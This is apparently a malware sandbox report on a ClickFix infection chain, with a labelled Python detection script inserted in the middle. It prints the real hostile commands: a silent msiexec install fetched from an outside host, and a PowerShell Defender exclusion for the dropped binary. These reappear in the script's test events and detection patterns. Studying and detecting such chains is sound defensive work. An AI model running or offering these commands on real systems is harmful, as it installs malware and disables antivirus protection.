Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qn Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
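The process tree above is the whole ClickFix chain in four command lines: cmd.exe runs msiexec against a URL with /qn, the MSI Wrapper payload drops 0xBKHFISYHPX.exe into the user's Temp directory, that binary calls Add-MpPreference to exclude the path it is about to write Hueta.exe to, and Hueta.exe starts. The following is an added example, not part of the sandbox report and not Joe Sandbox's own logic: a Python triage script that turns those three behaviours into detection rules (the ideas behind the "msiexec download and execute" and "Base64 Encoded MpPreference Cmdlet" Sigma hits listed for this sample) and runs them over constructed process-creation events modelled on the command lines in this section. The parent of the first event, the base64-encoded variant, and the two benign control events (including the file name 7z2409-x64.msi) are assumptions.

```python
"""Process-creation triage for a ClickFix -> msiexec -> Defender-exclusion chain.
Added example; the events below are constructed from the report's command lines."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    """Minimal process-creation record (what Sysmon EID 1 or 4688 gives you)."""
    parent_image: str
    image: str
    command_line: str


# msiexec told to install a package from an http(s) URL ("/i https://..." or "/package https://...")
MSI_REMOTE_RE = re.compile(r"msiexec(?:\.exe)?\b.*?(?<!\S)[/-](?:i|package)\s+[\"']?https?://", re.I | re.S)
# msiexec quiet/passive switches: /q /qn /qb! /quiet /passive
MSI_QUIET_RE = re.compile(r"(?<!\S)[/-](?:q[nbrf]?[!+-]*|quiet|passive)(?=\s|$)", re.I)
# common spellings of powershell -EncodedCommand followed by the base64 payload
PS_ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Add-/Set-MpPreference with any of its -Exclusion* parameters
MP_EXCLUSION_RE = re.compile(r"\b(?:add|set)-mppreference\b.*?-exclusion(?:path|process|extension|ipaddress)", re.I | re.S)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(text: str) -> str:
    """Base64 of the UTF-16LE text, the form powershell -EncodedCommand expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument, or None if there is none / it is not valid."""
    m = PS_ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def base64_fragments(needle: str) -> List[str]:
    """The three base64 substrings that any UTF-16LE -EncodedCommand payload containing
    `needle` must contain, one per byte alignment mod 3. Rules that cannot decode
    (the Sigma 'Base64 Encoded MpPreference Cmdlet' style) match these directly."""
    raw = needle.encode("utf-16-le")
    fragments = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode().rstrip("=")
        head = (0, 2, 3)[offset]                          # leading chars tainted by the pad bytes
        tail = 0 if (offset + len(raw)) % 3 == 0 else 1   # last char depends on the byte after the needle
        fragments.append(enc[head:len(enc) - tail])
    return fragments


MPPREF_FRAGMENTS = base64_fragments("Add-MpPreference")


def detect(ev: ProcEvent) -> List[str]:
    hits: List[str] = []
    parent, image, cl = basename(ev.parent_image), basename(ev.image), ev.command_line
    # 1. msiexec fetching the package over the network (cmd /K wrappers included)
    if MSI_REMOTE_RE.search(cl):
        hits.append("msiexec_remote_install")
        if MSI_QUIET_RE.search(cl):
            hits.append("msiexec_remote_install_silent")
    # 2. the installer launching an executable it dropped in the user's Temp directory
    if parent == "msiexec.exe" and image.endswith(".exe") and TEMP_DIR_RE.search(ev.image):
        hits.append("msiexec_spawns_temp_executable")
    # 3. a Defender exclusion added via PowerShell, plain or base64-encoded
    if image in ("powershell.exe", "pwsh.exe"):
        if MP_EXCLUSION_RE.search(cl):
            hits.append("defender_exclusion_added")
        decoded = decode_encoded_command(cl)
        if decoded and MP_EXCLUSION_RE.search(decoded):
            hits.append("defender_exclusion_added_encoded")
        if any(f in cl for f in MPPREF_FRAGMENTS):
            hits.append("mppreference_b64_fragment")
    return hits


TEMP_EXE = r"C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_EXCLUSION = encode_command("Add-MpPreference -ExclusionPath 'C:\\Windows\\system32\\Hueta.exe'")

# Constructed events modelled on the report's process tree; the explorer.exe parent,
# the -enc variant and the two benign controls at the end are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\cmd.exe", "cmd /K msiexec /i https://kolepti.com/flare.msi /qn"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\msiexec.exe", "msiexec /i https://kolepti.com/flare.msi /qn"),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe", TEMP_EXE, f'"{TEMP_EXE}"'),
    ProcEvent(TEMP_EXE, PS, r'powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS, f"powershell.exe -nop -w hidden -enc {ENCODED_EXCLUSION}"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Users\user\Downloads\7z2409-x64.msi /qn"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS, "powershell.exe Get-MpPreference"),
]


def run_samples() -> List[List[str]]:
    return [detect(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{basename(ev.image):<20} {hits or '-'}")
```

The quiet switch is tagged separately on purpose: msiexec pulling a package from a URL is unusual on a managed fleet but not unheard of, while URL plus /qn from a cmd.exe that a user just pasted into the Run box is the ClickFix pattern. Rule 3 checks the encoded form two ways: by decoding the argument, which is what you do at triage time, and by matching the three alignment fragments, which is how the Sigma rule can match in an engine that cannot decode base64. A local silent install and a read-only Get-MpPreference produce no hits, which is the behaviour you want before this goes into an alerting pipeline.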
Source: C:\Windows\System32\appidpolicyconverter.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: appidapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_1_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cfgmgr32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: virtdisk.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: servicingcommon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: dpx.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_1_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appidapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: virtdisk.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Hueta.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\cmd.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: webio.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\cmd.exe Section loaded: schannel.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cmd.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: dpapi.dll
